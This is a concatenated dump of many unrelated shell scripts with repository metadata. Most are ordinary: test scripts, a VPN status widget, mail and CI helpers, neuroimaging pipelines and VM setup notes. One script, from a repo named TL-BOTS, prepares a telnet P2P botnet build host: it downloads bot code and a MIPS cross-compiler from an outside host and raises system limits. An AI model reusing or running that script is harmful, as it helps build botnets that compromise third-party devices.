printf "${bold}ERROR:${normal} Data differs!\n" >&2
exit 1
fi
echo
for nblocks in 1 2 4 8 16 32 ; do
echo "### (3.${nblocks}) Writing 2 blocks ..."
snap_cblk -C${card} ${options} -t${threads} -b2 --write cblk_read2.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Writing NVMe device!\n" >&2
exit 1
fi
echo "# Reading ${nblocks} blocks ..."
snap_cblk -C${card} ${options} -t${threads} -b${nblocks} --read cblk_read3.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Reading NVMe device!\n" >&2
exit 1
fi
echo "Compare results ..."
diff cblk_read2.bin cblk_read3.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Data differs!\n" >&2
exit 1
fi
echo
done
echo "SUCCESS"
}
# Dispatch: run the test case selected via -T (or implied by -d).
if [ "${TEST}" == "READ_BENCHMARK" ]; then
nvme_read_benchmark
fi
#
# System p specific performance counter registers. Try this if you do
# not know what it means.
#
# perf stat -e "{r100F8,r2D01A,r30004,r4E010},{r100F8,r2D01E,r30004,r4D01C},{r100F8,r2D01C,r30004,r4D01A},{r100F8,r2E010,r30004,r4D01E},{r100F8,r2001A,r30028,r4000A},{r1001C,r2D018,r30036,r4D018},{r100F8,r2D012,r30028,r4000A},{r1001C,r2D016,r30038,r4D016},{r100F8,r2D014,r30026,r4D012},{r1001C,r2D010,r30038,r4D010},{r100F8,r2C010,r30004,r4000A},{r1001C,r2C012,r30004,r4C01A},{r100F8,r2C016,r30004,r4C016},{r1001C,r2C01C,r30004,r4C01A},{r100F8,r2C018,r30004,r4C018},{r10036,r2C01A,r30036,r4C010},{r1001C,r2E01E,r30028,r4C014},{r1001C,r2001A,r30038,r4C012},{r1001C,r2C014,r30026,r4D014},{r1001C,r2C010,r30038,r4C01C}" <command>
#
if [ "${TEST}" == "PERF" ]; then
perf_test
fi
if [ "${TEST}" == "CBLK" ]; then
cblk_test
fi
if [ "${TEST}" == "READ_WRITE" ]; then
cblk_read_write
fi
# Default (-T NONE): only the initialization above was performed.
exit 0
| true |
4809b01960c822ef5f4f5af12dca1e60fa4f5db5 | Shell | restlessmodem/scripts | /protonvpnStatus.sh | UTF-8 | 599 | 3.09375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Script used by polybar for protonvpn widget
# Dump the current status once, then pull individual "Key: value" fields.
protonvpn status > /tmp/protonStatus
status=$(grep Status /tmp/protonStatus | cut -d ":" -f2 | tr -d " ")
server=$(grep Server /tmp/protonStatus | cut -d ":" -f2 | tr -d " ")
protocol=$(grep Protocol /tmp/protonStatus | cut -d ":" -f2 | tr -d " ")
load=$(grep Load /tmp/protonStatus | cut -d ":" -f2 | tr -d " ")
ks=$(grep "Kill Switch" /tmp/protonStatus | cut -d ":" -f2 | tr -d " ")  # currently unused

# $status must be quoted: with the unquoted original, an empty value
# (protonvpn not running / no Status line) made [ ... ] fail with a
# syntax error instead of printing "VPN disconnected".
if [ "$status" == "Connected" ]; then
    echo "VPN $status ($protocol) - $server - $load"
else
    echo "VPN disconnected"
fi
| true |
ce579ff0478a9d9616b505a0ed1ac76552b56f1a | Shell | danielthoren/Config-files | /shell/bash/conf.sh | UTF-8 | 581 | 4.125 | 4 | [] | no_license | #!/bin/bash
# Install this repo's bash init file: link it into $HOME and make .bashrc
# source it (idempotently).
workingDir=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )
dir=$HOME
fname='.bash_init.sh'

# Make sure common bash is installed
bash "$workingDir/../common_bash/conf.sh"

echo "Configuring bash in $dir"

# Remove any existing link/file before re-creating it (quoted: the
# original unquoted -f operand breaks if $HOME contains spaces).
if [ -f "${dir}/${fname}" ]; then
    echo "Bash config link exists, removing..."
    rm "${dir}/${fname}"
fi
ln -s "$workingDir/bash_files/bash_init.sh" "${dir}/${fname}"

# -q keeps the matching line off stdout; -F matches the file name
# literally (the leading '.' was previously treated as a regex wildcard).
if ! grep -qF -- "$fname" ~/.bashrc; then
    echo "Inserting source of .bash_init.sh into .bashrc"
    echo "source $dir/${fname}" >> ~/.bashrc
fi

echo "Done configuring bash"
| true |
39a09d7d92baf4d7b3c861d4cafc679e6ecd70d2 | Shell | vntkumar8/mail-server | /send_console | UTF-8 | 1,208 | 3.609375 | 4 | [
"MIT"
] | permissive | #!/bin/sh
printf "===========================================\n\t\tSMTP MAIL SERVER\t\t\n===========================================\n"
#printf "Sender's Email ID : "
# Remember the mailbox size so the read-receipt loop below can detect growth.
c=$(wc -l < old_mails)

# Collect sender, recipient and message via a zenity form; fields are
# written to mbook.csv separated by the literal '$' character.
zenity --forms --title="SMTP Send Mail Console" \
    --text="Enter required information" \
    --separator="$" \
    --add-entry="Your Email Address" \
    --add-entry="Recipient's Email Address" \
    --add-entry="Your Message " > mbook.csv 2> /dev/null
case $? in
    0)
        echo "trying to send mail...";;
    1)
        echo "No mail sent."
        ;;
    -1)
        echo "An unexpected error has occurred."
        ;;
esac

sender=$(cut -d '$' -f1 mbook.csv)
receiver=$(cut -d '$' -f2 mbook.csv)
tbody=$(cut -d '$' -f3 mbook.csv)
#echo $sender $receiver $tbody

# Quote all user-supplied values: the message body almost always contains
# spaces, and the unquoted original split it into multiple swaks arguments.
swaks -h domain.com -f "$sender" -t "$receiver" --body "$tbody" -s localhost -p 2525 > sender.log
lno=$(wc -l < sender.log)
if [ "$lno" -gt 20 ]
then
    notify-send "Mail Sent to $receiver"
else echo "There was some trouble.
Kindly check the sender.log file for details about problem"
fi

## read receipts
# Poll the mailbox; when its line count changes, the mail was read.
# Sleep between polls so the loop no longer spins at 100% CPU.
while :
do
    d=$(wc -l < old_mails)
    if [ "$c" != "$d" ]
    then
        printf "Your Mail was read by receipient %s at " "$receiver"
        date -r old_mails
        break
    fi
    sleep 1
done
| true |
cee33156ac6dd7561be5a3bcd03f593a64bb4b54 | Shell | slamdev/polyglot-monorepo-playground | /ops/gitlab-runner/deploy/docker/runner/shutdown.sh | UTF-8 | 1,154 | 3.703125 | 4 | [] | no_license | #!/usr/bin/env bash
set -e
URL=${CI_SERVER_URL}/api/v4
# Runner token = the value between double quotes on the 'token' line of the
# local runner config.
RUNNER_TOKEN=`grep token /etc/gitlab-runner/config.toml | cut -d '"' -f 2`
echo "Runner token is ${RUNNER_TOKEN}"
# IDs of all registered runners whose description matches this runner's name.
EXISTING_RUNNERS=`curl --header "PRIVATE-TOKEN: ${PERSONAL_ACCESS_TOKENS}" "${URL}/runners/all" | \
jq ".[] | select(.description == \"${RUNNER_NAME}\") | .id"`
echo "Existing runners are ${EXISTING_RUNNERS}"
# Find the one whose API token equals our local token.
RUNNER_ID=""
for runner in ${EXISTING_RUNNERS}; do
current_token=`curl --header "PRIVATE-TOKEN: ${PERSONAL_ACCESS_TOKENS}" "${URL}/runners/${runner}" | \
jq -re ".token"`
if [ "${current_token}" = "${RUNNER_TOKEN}" ]
then
RUNNER_ID=${runner}
break
fi
done
echo "Runner with token ${RUNNER_TOKEN} has ${RUNNER_ID} id"
# Poll every 5 s until the runner reports no running jobs.
if [ "${RUNNER_ID}" != "" ]
then
while [ "`curl --header "PRIVATE-TOKEN: ${PERSONAL_ACCESS_TOKENS}" "${URL}/runners/${RUNNER_ID}/jobs?status=running" | jq -re '.[].id'`" != "" ]
do
echo "Some jobs are still in progress"
sleep 5
done
fi
echo "No jobs are running at the moment. Shutting down the runner"
# Sleep for 60 seconds to make sure that runner finished processing
sleep 60
| true |
0897dc2df5d8e10b1a363582b0d599e96a4c58c7 | Shell | rebeccaemma24/ABCD_IDP_Processing | /run_IDP_extraction.sh | UTF-8 | 3,407 | 3.1875 | 3 | [] | no_license | #!/bin/bash
# extract IDPs into text files necessary- this is one long textfile of numbers for each subj :)
# Accompanying scripts: struct_IDPs.sh microIDPs.sh , concat_IDPs.sh
# *** AVERAGE TRACT MASKS MUST BE CREATED IN FORM ${structure}_av_mask.nii.gz AND STORED IN IDPdir/xtract_averages ***
# *** USE GET_AVERAGES.SH TO DO THIS STEP IF NOT ALREADY CREATED ***
#----------------------------------
# step 1: load in all subject IDs and set up paths
#----------------------------------
# Each line of subj_IDs.txt (redirected in at the bottom) holds subject IDs.
while read line; do
for subj in $line; do #nb in form 'sub-***'
subdir=/share/neurodev/Rebecca/ABCD/derivatives/${subj}/ses-baselineYear1Arm1
T1=${subdir}/T1
T2=${subdir}/T2_FLAIR
diffdir=${subdir}/dwi_fsl
warpdir=${subdir}/xfms
IDPdir=/share/neurodev/Rebecca/ABCD/IDP_extraction
xtractdir=${subdir}/dwi_fsl.xtract/tracts
mkdir -p ${IDPdir}/IDPs/${subj}
#--------------------------------------
# step 2: STRUCTURAL IDPS
#--------------------------------------
cd /share/neurodev/Rebecca/ABCD/derivatives/${subj}
# Generate IDPs using ukbb pipeline script
BB_BIN_DIR=/share/neurodev/Rebecca/ABCD/UK_biobank_pipeline_v_1
templ=${BB_BIN_DIR}/templates
export BB_BIN_DIR templ
# fsl_sub output (a job id, presumably) is captured and fed to later
# submissions via -j so they wait for this job — TODO confirm.
bb_IDP=`${FSLDIR}/bin/fsl_sub -q short.q -l ${T1}/logs -N idp_${subj} ${BB_BIN_DIR}/bb_IDP/bb_IDP ${subdir}`
# Put all subjects IDPs in a single file, by calling struct_IDPs
cd ${IDPdir}
${FSLDIR}/bin/fsl_sub -q short.q -l ${IDPdir}/IDPs/${subj}/logs -j ${bb_IDP} -N struct_IDPs sh struct_IDPs.sh ${subdir} ${IDPdir} ${subj}
echo `date` submitted structural IDPs
#--------------------------------------
# step 3: MICROSTRUCTURAL TRACT-SPECIFIC IDPS
#--------------------------------------
#----------------------------------
# 3i: prepare dti/dki
#----------------------------------
# get radial diffusivity map (L2+L3)/2
rd=`${FSLDIR}/bin/fsl_sub -q short.q -l ${subdir}/dti/logs ${FSLDIR}/bin/fslmaths ${subdir}/dti/dti_L2.nii.gz -add ${subdir}/dti/dti_L3.nii.gz -div 2 ${subdir}/dti/dti_RD.nii.gz`
# threshold dki_kurt data to be between 0 and 5
dki_thr=`${FSLDIR}/bin/fsl_sub -q short.q -l ${subdir}/dki/logs -j ${rd} ${FSLDIR}/bin/fslmaths ${subdir}/dki/dki_kurt.nii.gz -thr 0 -uthr 5 ${subdir}/dki/dki_kurt_thr.nii.gz`
#----------------------------------
# 3ii: warp average tract masks into subj diffusion space
#----------------------------------
mkdir -p ${subdir}/dwi_fsl.xtract/av_masks_native
# One microIDPs.sh job per tract; each waits (-j) on the dki threshold job.
for structure in ac af_l af_r ar_l ar_r atr_l atr_r cbd_l cbd_r cbp_l cbp_r cbt_l cbt_r cst_l cst_r fa_l fa_r fma fmi fx_l fx_r ifo_l ifo_r ilf_l ilf_r mcp mdlf_l mdlf_r or_l or_r slf1_l slf1_r slf2_l slf2_r slf3_l slf3_r str_l str_r uf_l uf_r vof_l vof_r; do
tract_stats=`${FSLDIR}/bin/fsl_sub -q short.q -j ${dki_thr} -l ${IDPdir}/IDPs/${subj}/logs -N tract_stats sh microIDPs.sh ${structure} ${subj} ${subdir} ${IDPdir} ${warpdir} ${diffdir} ${xtractdir} ${IDPdir}/IDPs/${subj}`
done
echo `date` ALL MICRO IDPS EXTRACTED
#----------------------------------
# step 4: COMBINE ALL IDPS TOGETHER
#----------------------------------
# call concat_IDPs, which creates a text file of all micro IDPs, and creates one text file of all structural and micro IDPs for each subject in their folder
# needs: IDP_files directory (the outdir), subj
# NOTE(review): ${tract_stats} only holds the job id of the LAST tract, so
# this may not wait for all tract jobs — verify against fsl_sub semantics.
${FSLDIR}/bin/fsl_sub -q short.q -l ${IDPdir}/IDPs/${subj}/logs -j ${tract_stats} -N concat_IDPs sh concat_IDPs.sh ${IDPdir}/IDPs/${subj} ${subj}
done
done < subj_IDs.txt
| true |
9dffd036445b869d53181d4681d651dd4b816eba | Shell | chazer/docker-toran-proxy | /addkey.sh | UTF-8 | 158 | 2.875 | 3 | [] | no_license | #!/bin/sh
# Append the SSH host key of "host[:port]" ($1) to keys/known_hosts.
# A trailing ':' is appended so cut always sees at least two fields.
target="$1:"
HOST=$(cut -d':' -f 1 <<<"$target")
PORT=$(cut -d':' -f 2 <<<"$target")
# Default to the standard SSH port when none was given.
if [ -z "$PORT" ]; then
    PORT=22
fi
ssh-keyscan -p "$PORT" "$HOST" >> keys/known_hosts
| true |
18cc6163499ce1dc05acc61d03420bb11651011e | Shell | stardog-union/stardog-graviton | /ci/create-db.sh | UTF-8 | 455 | 3.140625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -eu

# Locate the build artifacts produced by earlier CI steps.
START_DIR=$(pwd)
OUTPUT_DIR=${START_DIR}/OUTPUT
GRAV_EXE=$(ls $OUTPUT_DIR/linux/stardog-graviton-*)
LAUNCH_NAME=$(cat $OUTPUT_DIR/name)
RELEASE_FILE=$OUTPUT_DIR/stardog-$STARDOG_VERSION.zip

export STARDOG_VIRTUAL_APPLIANCE_CONFIG_DIR=$OUTPUT_DIR

# Test the command directly: under 'set -e' a failing command aborts the
# script before any '$?' check runs, and the original test was also broken
# by a missing space ('[ $? -ne 0]').  (A duplicate LAUNCH_NAME assignment
# was removed as dead code.)
if ! python ./ci/create_db.py $OUTPUT_DIR $RELEASE_FILE $GRAV_EXE $LAUNCH_NAME; then
    echo "Fail"
    exit 1
fi
echo "Success"
exit 0
| true |
83238e3c83072e3316249237e0fd54d18b0244c0 | Shell | momor666/Academic-LabWork | /Operating System/Lab-3/Workout files/input.sh | UTF-8 | 136 | 3.21875 | 3 | [] | no_license | echo "enter e year number: "
read -r year
echo "$year"
# Gregorian rule: a year is leap when divisible by 4 except century years,
# which must be divisible by 400. The original bare %4 test wrongly
# reported years like 1900 as leap years.
is_leap() {
    local y=$1
    (( (y % 4 == 0 && y % 100 != 0) || y % 400 == 0 ))
}
if is_leap "$year"
then
    echo "leap year"
else
    echo "not a leap year"
fi
| true |
7eff5568c6f3fe966f95415208510d625cb8b7e8 | Shell | bhageena/TL-BOTS | /TL.P2P/P2P.jsp2p/jsp2p.sh | UTF-8 | 2,480 | 3 | 3 | [] | no_license | #!/bin/bash
echo "###############################################################################"
echo "# ___ __________ ____ _______ _____ _______________.___. ___ #"
echo "# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #"
echo "# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #"
echo "# | | \ | / | \/ | \ | \\____ | #"
echo "# |______ / |___\____|__ /\____|__ /____|_ // ______| #"
echo "# \/ \/ \/ \/ \/ #"
echo "###############################################################################"
#########################################
###############UPDATING##################
#########################################
echo "Updating Your Shit"
yum update -y;
#########################################
#############DEPENDENCIES################
#########################################
echo "Setting Up Dependencies For JS P2P Telnet"
yum install curl; yum install screen -y; yum install httpd -y; yum install telnet -y; yum install gcc -y; yum install nano -y; yum install unzip -y; yum install wget; yum install glibc.i686 -y
curl --silent --location https://rpm.nodesource.com/setup | bash -; yum install nodejs -y;
#########################################
###############WGETTING##################
#########################################
echo"Getting Your Net Shit"
mkdir compile;
mkdir telnet;
wget http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 && tar -vxjf cross-compiler-mips.tar.bz2;
wget http://b.1339.cf/qbrdwgg.zip;
wget http://b.1339.cf/sygnxbv.c;
#########################################
###############ORGANIZING################
#########################################
cd /root/; mv cross-compiler-mips compile;
cd /root/; mv sygnxbv.c compile;
cd /root/telnet/; mv sygnxbv.c cross-compiler-mips;
cd /root/telnet/cross-compiler-mips; mv sygnxbv.c bin
cd /root/; mv qbrdwgg.zip telnet;
cd /root/telnet/; unzip *zip;
cd /root/telnet/; rm -rf qbrdwgg.zip;
cd /root/; rm -rf cross-compiler-mips.tar.bz2;
#########################################
################ULIMIT###################
#########################################
echo "Fixxing The Ulimit"
ulimit -n 999999; ulimit -u 999999
sysctl -w fs.file-max=100000
echo "Done, Your On Your Own Now" | true |
6778e50b4da1a439dfd0b1d7ae7acae1b18dfbfb | Shell | ngyl88-tw/Infra-Guild-2019 | /week2/terraform-playground/resources/init/bootstrap.sh | UTF-8 | 376 | 2.6875 | 3 | [] | no_license | #!/usr/bin/env bash
# bash -c "help set"
# -x: print commands
# -u: errors on unset variables
# -e: exit immediately on error
# -o pipefail: a pipeline fails if any stage fails
# (-u is now actually enabled; the comment above documented it but the
# original 'set -eo pipefail' did not set it. No unset vars are used here.)
set -euo pipefail

add-apt-repository ppa:openjdk-r/ppa -y
apt-get update -q # q: quiet (omitting progress indicators)
apt-get install -y openjdk-11-jre-headless

mv /tmp/init/hello.service /etc/systemd/system/hello.service
# A newly placed unit file is not visible to systemd until it rescans.
systemctl daemon-reload
systemctl start hello
| true |
5bfe4a9fab66e414224a5a12e463d65d75724aa8 | Shell | paulpeng-popo/RSA | /shell-script/KGC.sh | UTF-8 | 282 | 3.328125 | 3 | [] | no_license | #!/bin/bash
# Install OpenSSL via apt first when the binary is not already on PATH.
if ! command -v openssl > /dev/null 2>&1; then
    sudo apt install openssl -y
fi

KEY_LEN=2048
KEY_NAME=key

# Generate the RSA private key.
openssl genrsa -out "${KEY_NAME}.pem" "${KEY_LEN}"
# Derive the matching public key from the private key.
openssl rsa -in "${KEY_NAME}.pem" -pubout > "${KEY_NAME}.pub"
| true |
da234ca5dcaa6bcc7b6bd814f6bd1cb12a70eea7 | Shell | feizeikesi/openstack | /openstack-cinder-compute.sh | UTF-8 | 1,522 | 2.8125 | 3 | [] | no_license | #!/bin/bash
# Set environment variables
DEV=/dev/sda
MY_IP=192.168.0.155
# Install and start the LVM metadata daemon, then turn $DEV into the
# cinder-volumes volume group.
yum install -y lvm2
systemctl enable lvm2-lvmetad.service
systemctl start lvm2-lvmetad.service
pvcreate $DEV
vgcreate cinder-volumes $DEV
# Back up lvm.conf, then restrict LVM scanning to sda only.
cp /etc/lvm/lvm.conf{,.$(date +%s).bak}
sed -i '141a filter = [ "a/sda/", "r/.*/"]' /etc/lvm/lvm.conf # append after line 141
yum install -y openstack-cinder targetcli python-keystone
# Back up cinder.conf, then overwrite it with the storage-node config.
# The single quotes are closed around $RABBIT_PASS/$MY_IP/$CINDER_DBPASS/
# $CINDER_PASS so those shell variables expand inside the file content.
cp /etc/cinder/cinder.conf{,.$(date +%s).bak}
echo '
[DEFAULT]
transport_url = rabbit://openstack:'$RABBIT_PASS'@controller.yun.tidebuy
auth_strategy = keystone
my_ip = '$MY_IP' #存储节点上管理网络接口的IP地址
enabled_backends = lvm
glance_api_servers = http://controller.yun.tidebuy:9292
[database]
connection = mysql+pymysql://cinder:'$CINDER_DBPASS'@controller.yun.tidebuy/cinder
[keystone_authtoken]
auth_uri = http://controller.yun.tidebuy:5000
auth_url = http://controller.yun.tidebuy:35357
memcached_servers = controller.yun.tidebuy:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = cinder
password = '$CINDER_PASS'
[lvm]
volume_driver = cinder.volume.drivers.lvm.LVMVolumeDriver
volume_group = cinder-volumes
iscsi_protocol = iscsi
iscsi_helper = lioadm
[oslo_concurrency]
lock_path = /var/lib/cinder/tmp
'>/etc/cinder/cinder.conf
# Tighten permissions and start the volume services.
chmod 640 /etc/cinder/cinder.conf
chgrp cinder /etc/cinder/cinder.conf
systemctl enable openstack-cinder-volume.service target.service
systemctl start openstack-cinder-volume.service target.service
a2af8495c6994dd395c7af7ad48ddc7815fe7595 | Shell | prashanth-royal/Shell-Programming | /Selection-programming/leapyear.sh | UTF-8 | 190 | 3.546875 | 4 | [] | no_license | #!/bin/bash -x
echo -n "Enter year (YYYY) : "
read -r y

# Gregorian rule: leap when divisible by 4 and not by 100, OR divisible by
# 400. The original only tested y%4==0 && y%100!=0, so century leap years
# such as 2000 were misreported as non-leap.
is_leap_year() {
    local yr=$1
    (( (yr % 4 == 0 && yr % 100 != 0) || yr % 400 == 0 ))
}

if is_leap_year "$y"
then
    echo "$y is a Leap Year"
else
    echo "$y is not a leap year"
fi
| true |
5272f8729170b59795e39cbcb6f39b13c59f92f8 | Shell | lapy/Hassio-Addons | /mopidy/run.sh | UTF-8 | 654 | 2.96875 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bashio
set -e

bashio::log.info 'Update Certificates'
update-ca-certificates

bashio::log.info 'Create media folder if not existing'
mkdir -p /share/mopidy/media
mkdir -p /share/mopidy/playlists

bashio::log.info 'Setup config'
# Read add-on options; 'options' becomes "-o name=value -o name=value ...".
local_scan=$(jq -r '.local_scan // empty' /data/options.json)
options=$(jq -r 'if .options then [.options[] | "-o "+.name+"="+.value ] | join(" ") else "" end' /data/options.json)
# Split the option string into separate arguments. The original passed
# "$options" quoted, handing mopidy the whole string as ONE argument (and
# an empty-string argument when no options were configured).
read -r -a option_args <<< "$options"
config="/var/lib/mopidy/.config/mopidy/mopidy.conf"

bashio::log.info 'Start Mopidy....'
if [ "$local_scan" == "true" ]; then
    mopidy --config "$config" "${option_args[@]}" local scan
fi
mopidy --config "$config" "${option_args[@]}"
| true |
0f40c9d600ff5e719d0c2282b39679af76800c90 | Shell | saimib/serverless-chrome | /packages/lambda/scripts/package-binaries.sh | UTF-8 | 1,680 | 4.34375 | 4 | [
"MIT"
] | permissive | #!/bin/sh
# shellcheck shell=dash
#
# Builds specified or all headless browsers (chromium, firefox) version defined in package.json
#
# Requires Docker, jq, and zip
#
# Usage: ./build-binaries.sh [chromium|firefox] [stable|beta|dev]
#
set -e

# Run from the package root regardless of the caller's working directory.
cd "$(dirname "$0")/.."
PACKAGE_DIRECTORY=$(pwd)
# Package one headless-browser binary for one release channel.
# $1 - build name (e.g. chromium), $2 - channel (stable|beta|dev).
# Extracts /bin/headless-$1 from the matching docker image, zips it, and
# copies it into the package dist/ dir; skips if the zip already exists.
packageBinary() {
BUILD_NAME=$1
CHANNEL=$2

cd "$PACKAGE_DIRECTORY/builds/$BUILD_NAME"

DOCKER_IMAGE=headless-$BUILD_NAME-for-aws-lambda
# The channel's version number comes from this build's version.json.
VERSION=$(jq -r ".$CHANNEL" version.json)
BUILD_PATH="dist/$BUILD_NAME"
ZIPFILE_PATH="$CHANNEL-headless-$BUILD_NAME-$VERSION-amazonlinux-2017-03.zip"

if [ ! -f "dist/$ZIPFILE_PATH" ]; then
echo "Packaging $BUILD_NAME version $VERSION ($CHANNEL)"

mkdir -p "$BUILD_PATH"

# Extract binary from docker image
docker run -dt --rm --name "$DOCKER_IMAGE" "adieuadieu/$DOCKER_IMAGE:$VERSION"
docker cp "$DOCKER_IMAGE":/bin/headless-"$BUILD_NAME" "$BUILD_PATH"
docker stop "$DOCKER_IMAGE"

# Package
cd "$BUILD_PATH"
zip -9 -D "../$ZIPFILE_PATH" "headless-$BUILD_NAME"
cd ../../

# stick a copy in packages' dist/ for tests and local dev
mkdir -p "$PACKAGE_DIRECTORY/dist"
cp "$BUILD_PATH/headless-$BUILD_NAME" "$PACKAGE_DIRECTORY/dist/$CHANNEL-headless-$BUILD_NAME"

# Cleanup
rm -Rf "$BUILD_PATH"
else
echo "$BUILD_NAME version $VERSION was previously package. Skipping."
fi
}
# main script
if [ -n "${1-}" ]; then
  # Package only the requested browser/channel combination.
  packageBinary "$1" "$2"
else
  # No arguments: package every browser found under builds/, all channels.
  cd "$PACKAGE_DIRECTORY/builds"
  for dockerfile in */Dockerfile; do
    browser="${dockerfile%%/*}"
    packageBinary "$browser" stable
    packageBinary "$browser" beta
    packageBinary "$browser" dev
  done
fi
| true |
53ac4e9a76bd9a293c5b743b640d7b5b451bff23 | Shell | maxwell2861/packer | /package/linux/role/bastion/awsEC2-Query.sh | UTF-8 | 1,470 | 3.21875 | 3 | [] | no_license | #!/bin/bash
# Print a diagnostic and abort with the step's status when it failed.
# $1 - exit status of the previous step (non-zero aborts the script)
# $2 - line number for the message, $3 - label describing the step
ALERTMsg(){
    if [ "$1" -ne 0 ]; then
        echo "Warn: [LineNum: $2] - [ $3 ] - did not complete successfully" >&2
        exit "$1"
    fi
}
# Abort unless the AWS CLI is installed.
[[ ! -f /usr/bin/aws ]] && ALERTMsg "1" $LINENO "CHECK: /usr/bin/aws";
# If the legacy EC2 API tools are present, load credentials and add them
# to PATH.
[[ -e /opt/aws ]] && {
source /maxwell/set/qcon/.aws_credentials
export EC2_HOME=/opt/aws/apitools/ec2
export EC2_BIN=$EC2_HOME/bin
export PATH=$PATH:$EC2_BIN
}
#LOGD=`pwd`
LOGD="${HOME}/.econ"
mkdir -p ${LOGD}
LOGF=$LOGD/EC2QueryRES.log
ERRF=$LOGD/EC2QueryRES.err
WORF=$LOGD/EC2QueryRES.work.log
# Filters: instances tagged Env=$1 that are currently running; the query
# returns [type, Name tag, private IP] for non-Windows (Platform==null).
QFIL1="Name=tag:Env,Values=$1"
QFIL2="Name=instance-state-name,Values=running"
QSTR='Reservations[].Instances[?Platform==`null`].[InstanceType,Tags[?Key==`Name`].Value[],PrivateIpAddress]'
# Sanity probe without filters; only the output length is inspected.
QCHK=`aws ec2 describe-instances --output text --query $QSTR`
QLEN=`echo $QCHK | awk '{ print length }'`
if test $QLEN -gt 0
then
# Truncate previous result files before re-querying.
[[ -f $LOGF ]] && rm -rf $LOGF && touch $LOGF > /dev/null 2>&1
[[ -f $ERRF ]] && rm -rf $ERRF && touch $ERRF > /dev/null 2>&1
# sed joins every pair of lines; results are sorted by the 3rd column.
aws ec2 describe-instances --filters $QFIL1 $QFIL2 --output text --query $QSTR | sed '$!N;s/\n/ /' | sort -k 3 > $LOGF 2> $ERRF &
wait
# Pick a 1- or 2-digit zero-padded width for numbering, based on row count.
# NOTE(review): FRCNT is declared as an array; [[ $FRCNT -le 9 ]] only
# inspects element 0 (the line count), which happens to work.
FRCNT=($(cat $LOGF | wc -l));
[[ $FRCNT -le 9 ]] && FWCNT=1;
[[ $FRCNT -ge 10 ]] && FWCNT=2;
nl -nrz -w$FWCNT $LOGF > $WORF;
ALERTMsg "0" $LINENO "CHECK: QSTR";
else
ALERTMsg "1" $LINENO "CHECK: QSTR";
fi
| true |
37338a321aa3c04f931ad3a2cc53ff1508b0cbf5 | Shell | cr3m/malkoo | /Provision/VM_config/config-remnux.sh | UTF-8 | 1,008 | 2.5625 | 3 | [] | no_license | # Setting up REMnux
# NOTE(review): this file is a copy/paste runbook, not a script to execute
# top-to-bottom — 'reboot' below would stop execution, and the
# "internal net" / "back to bridge" sections are mutually exclusive
# alternatives.
# Power -> Blank screen to never
# Install VirtualBox Guest Additions:
sudo mount /dev/cdrom /mnt
sudo /mnt/VboxLinuxAdditions.run
reboot
# Switch to internal net:
sudo sed -i 's/dhcp/static\n\taddress 172.27.0.1\n\tnetmask 255.255.255.0/g' /etc/network/interfaces
sudo ifdown eth0
sudo ifup eth0
ifconfig
# Back to bridge
sudo sed -i 's/static/dhcp/g' /etc/network/interfaces
sudo sed -i 's/\tnetmask 255.255.255.0//g' /etc/network/interfaces
sudo sed -i 's/\taddress 172.27.0.1//g' /etc/network/interfaces
sudo ifdown eth0 && sudo ifup eth0 && ifconfig
# Start ssh on boot:
sudo sed -i 's/exit 0/\/etc\/init.d\/ssh start\nexit 0/g' /etc/rc.local
sudo chmod +x /etc/rc.local
# Vagrant
# Zero out free space on hard drive
# Make sure VM nic1 is in NAT mode
# Make sure SSH starts on boot
# No firewalls up
# vagrant package --base <vm_name> --vagrantfile /path/to/Vagrantfile --output <new_name.box>
# vagrant box add /path/to/new_name.box --name <new_name>
# vagrant up
| true |
85ab92a6ecd25759878ff0b5527ab8d4ca004985 | Shell | BlankOn/blankon-installer | /tests/setup-fs | UTF-8 | 580 | 3.09375 | 3 | [
"FSFAP"
] | permissive | #!/bin/bash
# Test harness for b-i-setup-fs: fabricate the live-image inputs it expects
# under a throw-away root, run it, then verify its outputs.
set -x
set -e
pushd `dirname $0`
ROOTFS=/tmp/setup-fs
mkdir -p $ROOTFS
# Shared test helpers (provides check_file used below).
. ./functions
### Initialization
mkdir -p $ROOTFS/live/image/live
cat << @@EOF > $ROOTFS/live/image/live/packages-to-remove
p1
p2
p3
@@EOF
mkdir -p $ROOTFS/tmp
echo "1 testuser" > $ROOTFS/tmp/user-setup
echo "testuser:testpasswd" > $ROOTFS/tmp/user-pass
cat << @@EOF > $ROOTFS/tmp/user-info
long name
room
work
home
@@EOF
echo "testhostname" > $ROOTFS/tmp/hostname
mkdir -p $ROOTFS/target/etc/
### Test
# Source the script under test so it sees ROOTFS in this shell.
. ../scripts/b-i-setup-fs
### Checking
check_file $ROOTFS/_removed "p1 p2 p3"
popd
| true |
8612d12f4c68f0a7899f6182f3b317e997928a6d | Shell | ChickTechRDU/rpi-wordpress-screen | /files/bin/atestprocess.sh | UTF-8 | 276 | 3.203125 | 3 | [] | no_license | #!/bin/bash
# Toggle a long-lived dummy background process (used as a test target).
# Usage: atestprocess.sh start|stop
usage() {
	echo "${0} start|stop"
	exit 1
}

[ "$#" -eq 1 ] || usage

case "${1}" in
	start)
		# keep an infinite sleeper alive in the background
		while /bin/true; do
			sleep infinity
		done &
		;;
	stop)
		# kill any process whose command line mentions this script's name
		pkill -f atestprocess
		;;
	*)
		usage
		;;
esac
| true |
17c88bab844f273f763556e2dfc031fa80863d4a | Shell | cmarat/LDBC-MMB | /driver/QE/runWorkload.sh | UTF-8 | 2,399 | 3.71875 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Format used by the `time` builtin further below: real time, 3 decimals.
TIMEFORMAT='%3R'
# All four positional arguments are mandatory.
if [ -z "$1" -o -z "$2" -o -z "$3" -o -z "$4" ]
then
echo "Usage: runWorkload.sh [Workload File] [SPARQL Endpoint URL] [Result Dir] [Log File]"
exit 1
fi
# Refuse to clobber the results of a previous run.
if [ -d $3/QE ]
then
echo "Directory: $3/QE already exits. Will not overwrite, exiting."
exit 1
else
